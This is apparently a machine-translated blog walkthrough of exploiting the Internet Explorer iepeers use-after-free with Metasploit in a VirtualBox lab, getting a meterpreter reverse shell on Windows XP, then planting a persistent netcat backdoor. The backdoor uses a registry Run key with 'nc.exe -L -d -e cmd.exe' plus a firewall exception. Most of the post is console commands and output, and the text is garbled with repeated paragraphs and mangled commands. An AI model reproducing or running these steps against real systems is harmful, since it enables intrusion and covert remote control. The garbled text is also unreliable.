March 10 I get an email from one a day, reporting the new 0-day
of Internet Explorer, which targets 6 and 7 versions, versions 5 and 8 are not affected. As a countermeasure would be those who use IE to migrate fully to the version 8. Statistically, approximately 100 people. 20 would be using versions 6 and 7 of IE, I leave a picture
The BOF is an exploit that attacks
ie_iepeers
library can execute arbitrary code with privileges of the user as the executing browser. order to use it from the metasploit before do a update to freamwork.
# msfupdate 
Starting
This post is in two parts first the attack to exploit
ie_iepeers,
Well the data load is exactly like the form where shown in the post Metasploit previous
LINK, show you all together since the election of the exploit, setpoints of variables to launch the exploit.
This post is in two parts first the attack to exploit
ie_iepeers,
and then upload netcat and leave it as persistent backdor the victim. 
Tools
as a laboratory and I have a Debian 5.0 host system, Windows XP SP 3 - Internet Explorer 6.0 running as a host system, VirtualBox 3.1.4 r57640, Metasploit Framework Version: 3.3.4-de
First Party
as a laboratory and I have a Debian 5.0 host system, Windows XP SP 3 - Internet Explorer 6.0 running as a host system, VirtualBox 3.1.4 r57640, Metasploit Framework Version: 3.3.4-de
First Party
Well the data load is exactly like the form where shown in the post Metasploit previous
LINK, show you all together since the election of the exploit, setpoints of variables to launch the exploit.
Great: / home / magnus # msfconsole 
set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(
ie_iepeers_pointer ) > 
set URIPATH /
URIPATH => /
msf exploit(
set URIPATH / URIPATH => /
msf exploit(
ie_iepeers_pointer ) > show options
Module options: Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.56.1 yes The local host to listen on.
Name Current Setting Required Description ---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.56.1 yes The local address
LPORT 4444 yes The local port Exploit target:
Id Name -- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit ( ie_iepeers_pointer )>
exploit [*] Exploit running as background
job.
msf exploit (ie_iepeers_pointer)> Module options: Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.56.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.56.1 yes The local address
LPORT 4444 yes The local port Exploit target:
Id Name -- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit ( ie_iepeers_pointer )>
exploit [*] Exploit running as background
job.
reverse handler on 192.168.56.1:4444
[*] Using URL
: http://192.168.56.1:8080/
[*] Server started
.
see that the attacker has the ip 192.168.56.1, now would stay the victime http://192.168.56.1:8080 enter the address, which is made by the malicious page metasploit, where if you meet the requirements of the exploit will execute the payload on the victim machine.
then proceeds
The Metasploit console can see how they run and have a session meterpreter.
msf exploit (ie_iepeers_pointer)>
[*] Started
reverse handler on 192.168.56.1:4444
[*] Using URL
: http://192.168.56.1:8080/
[* ] Server started.
[*] Sending Internet Explorer iepeers.dll Use After Free to 192.168.56.101:1034 ...
[*] Sending stage (748,032 bytes) [*] Meterpreter session 1 OPEN (192.168.56.1:4444 -> 192.168.56.101:1035)
[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.101:1035) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1364)
[*] Spawning a notepad.exe host process... [*] Migrating into process ID 188
[*] New server process: notepad.exe (188) msf exploit( ie_iepeers_pointer
) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
meterpreter VICTIM-55919B2 1 \\ 2 @ VICTIM victim-55919B2 192.168.56.1:4444 -> 192.168.56.101:1035
msf exploit (ie_iepeers_pointer)> sessions-i 1
[* ] Starting interaction with 1 ...
meterpreter> sysinfo
Computer: VICTIM-55919B2
OS: Windows XP (Build 2600, Service Pack 3).
Arch: x86
Language: en_US
meterpreter>
Part
After obtaining a session what we do is interact with the victim with meterpreter. This process is very simple backdor consist of raising the leaving netcat in listening to a port with a cmd.exe, and placing an exception in the firewall because the connection type will bind.
Raising the netcat
For this we need to have netcat for windows, I have it in my folder / home / and we will post it in the system32 folder, the sentence also would look like.
meterpreter>
upload / home / magnus / nc.exe c: \\ windows \\ \\ system32
[*]
uploading: / home / magnus / nc.exe -> c: \\ windows \\ system32
[*]
uploaded: / home / magnus / nc.exe -> c: \\ windows \\ system32 \\ nc.exe 
Then
add a registry key to boot windows netcat listening on port 1234 with the cmd.exe, so
-d daemon
.
Then add a registry key to boot windows netcat listening on port 1234 with the cmd.exe, so
-d daemon
.
meterpreter> reg setval
-k HKLM \\ \\ Software \\ Microsoft \\ \\ Windows \\ \\ CurrentVersion \\ \\ Run
-v realtek-d "C: \\ Windows \\ System32 \\ nc.exe-L-d -e cmd.exe-p 1234 'Successful
Hacked September.
quedaria Now we add an exception in windows firewall, the victim, for it pedismos metrpreter a shell and execute the commands as shown.
meterpreter>
execute cmd.exe-i-f-H Process 560 created.
Channel 3 created. Microsoft Windows XP [Versin 01/05/2600] (C) Copyright 1985-2001 Microsoft Corp..
C: \\ Documents and Settings \\ victima 2 \\ Escritorio> netsh firewall add portopening ALL 1234 "c: \\ windows \\ system32 \\ nc.exe" ALL netsh firewall add portopening 1234 "c: \\ windows \\ system32 \\ nc.exe" OK
C: \\ Documents and Settings \\ victim 2 \\ Desktop> netsh firewall show portopening netsh firewall show portopening
Settings port for the standard profile: Port Protocol Mode Name ----------------------------------- Enable TCP
1234 -------------------------------- c: \\ windows \\ system32 \\ nc.exe 1234 UDP Enable c: \\ windows \\ system32 \\ nc.exe
C: \\ Documents and Settings \\ victim 2 \\ Desktop> ^ C Terminate channel 3? [Y / N] and meterpreter> reboot
Rebooting ...
netsh command allows him to set us
windows firewall settings, what we do is to add an exception for the program netcat on port 1234 for UDP and TCP, and as an example then we can see that are placing
exeption with the command netsh firewall show portopening
gritted Crtl + c, does not give the meterpreter and reboot the computer of the victim. Now
Notice how the victim is listening on port 1234
we can only verify and enter the netcat to the victim of this form.
That's all Greetings
0 comments:
Post a Comment